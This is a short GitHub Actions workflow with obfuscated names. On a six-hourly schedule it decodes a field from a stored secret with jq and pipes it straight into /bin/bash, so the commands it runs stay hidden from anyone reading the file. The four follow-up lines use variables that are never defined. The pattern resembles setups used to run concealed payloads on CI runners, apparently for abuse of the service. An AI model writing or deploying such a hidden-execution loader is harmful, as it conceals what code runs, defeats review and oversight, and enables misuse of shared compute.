name: caidafu2345
on:
  workflow_dispatch:
  schedule:
    - cron: '53 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidafu2345
        env:
          nc8: ${{ secrets.nc8 }}
        run: |
          echo $nc8 | jq -r .ltf8735 | /bin/bash
          echo $idbvi1 | jq -r .zfbc8867 | /bin/bash
          echo $ry891 | jq -r .eyaxa78612 | /bin/bash
          echo $rkhm59922 | jq -r .hka6 | /bin/bash
          echo $kb381 | jq -r .sjucf95207 | /bin/bash

